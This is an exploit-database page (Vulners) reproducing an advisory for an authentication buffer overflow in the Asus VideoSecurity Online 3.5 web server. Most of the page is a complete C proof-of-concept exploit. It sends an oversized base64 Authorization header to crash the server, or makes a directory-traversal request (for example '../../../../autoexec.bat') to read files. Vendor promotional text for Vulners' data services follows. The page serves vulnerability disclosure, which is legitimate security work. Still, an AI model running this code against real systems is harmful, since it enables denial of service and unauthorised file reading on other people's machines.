Vulners
Lucene search
Asus VideoSecurity Online 3.5 Web Server Authentication Buffer Overflow Vulnerability
source: http://www.securityfocus.com/bid/15279/info
Asus VideoSecurity Online is prone to a buffer overflow in the authentication mechanism of the included Web server. This issue only exists if authentication is enabled on the Web server.
The Web server included with Asus VideoSecurity Online is not enabled by default.
This vulnerability is reported to affect Asus VideoSecurity Online 3.5.0 and earlier.
/* by Luigi Auriemma */ #include <stdio.h> #include <stdlib.h> #include
<string.h> #ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define ONESEC 1000 #else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1 #endif #define VER "0.1" #define PORT 80 #define
BUFFSZ 8192 #define BOFSZ 2700 u_char *delimit(u_char *data); int
http_get(u_char *in, int insz, u_char *out, int outsz); u_char
*base64_encode(u_char *data, int *length); u_int resolv(char *host); void
std_err(void); struct sockaddr_in peer; int main(int argc, char *argv[]) {
int len,
attack,
auth = 0;
u_short port = PORT;
u_char buff[BUFFSZ],
uri[BUFFSZ >> 1],
more[BUFFSZ >> 1],
userpass[64],
*b64,
*p; #ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata); #endif
setbuf(stdout, NULL);
fputs("\n"
"ASUS Video Security <= 3.5.0.0 HTTP multiple vulnerabilities
"VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attack:\n"
"1 = authorization buffer-overflow, works only if server uses
password\n"
"2 = directory traversal, if the server uses a password you
must know it\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
len = sprintf(buff,
"GET / HTTP/1.1\r\n"
"Connection: close\r\n"
"\r\n");
fputs("- check server\n", stdout);
len = http_get(buff, len, buff, sizeof(buff) - 1);
p = strstr(buff, "\r\n\r\n");
if(p) *p = 0;
if(strstr(buff, "Authenticate")) {
auth = 1;
fputs("- server uses password\n", stdout);
}
*uri = 0;
*more = 0;
switch(attack) {
case 1: {
if(!auth) {
printf(" Alert: the server doesn't use password so is not
vulnerable to this attack\n");
}
memset(buff, 'A', BOFSZ);
len = BOFSZ;
b64 = base64_encode(buff, &len);
sprintf(more, "Authorization: Basic %s\r\n", b64);
free(b64);
} break;
case 2: {
if(auth) {
fputs("- insert username:password (like asus:asus):\n ",
stdout);
fflush(stdin);
fgets(userpass, sizeof(userpass), stdin);
len = delimit(userpass) - userpass;
b64 = base64_encode(userpass, &len);
sprintf(more, "Authorization: Basic %s\r\n", b64);
free(b64);
}
fputs("- insert the URI (like ../../../../autoexec.bat):\n ",
stdout);
fflush(stdin);
fgets(uri, sizeof(uri), stdin);
delimit(uri);
} break;
default: {
printf("\nError: the attack %d is not available\n\n", attack);
exit(1);
} break;
}
sleep(ONESEC);
len = sprintf(buff,
"GET /%s HTTP/1.1\r\n"
"Connection: close\r\n"
"%s"
"\r\n",
uri,
more);
fputs("- launch attack\n", stdout);
len = http_get(buff, len, buff, sizeof(buff) - 1);
if(len < 0) {
fputs("- the server seems crashed\n\n", stdout);
} else {
fputs("- show the returned data:\n", stdout);
fputs(buff, stdout);
}
return(0); } u_char *delimit(u_char *data) {
while(*data > '\r') data++;
*data = 0;
return(data); } int http_get(u_char *in, int insz, u_char *out, int
outsz) {
int sd,
t,
len = 0;
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(send(sd, in, insz, 0)
< 0) std_err();
while(outsz) {
t = recv(sd, out, outsz, 0);
if(t < 0) {
len = -1;
break;
}
if(!t) break;
len += t;
out += t;
outsz -= t;
}
*out = 0;
close(sd);
return(len); } u_char *base64_encode(u_char *data, int *length) {
int r64len,
len = *length;
u_char *p64;
static u_char *r64;
const static char enctab[64] = {
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
};
r64len = ((len / 3) << 2) + 5;
r64 = malloc(r64len);
if(!r64) return(NULL);
p64 = r64;
do {
*p64++ = enctab[(*data >> 2) & 63];
*p64++ = enctab[(((*data & 3) << 4) | ((*(data + 1) >> 4) & 15)) &
63];
data++;
*p64++ = enctab[(((*data & 15) << 2) | ((*(data + 1) >> 6) & 3)) &
63];
data++;
*p64++ = enctab[*data & 63];
data++;
len -= 3;
} while(len > 0);
for(; len < 0; len++) *(p64 + len) = '=';
*p64 = 0;
*length = p64 - r64;
return(r64); } u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)(hp->h_addr);
}
return(host_ip); } #ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
} #endif
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1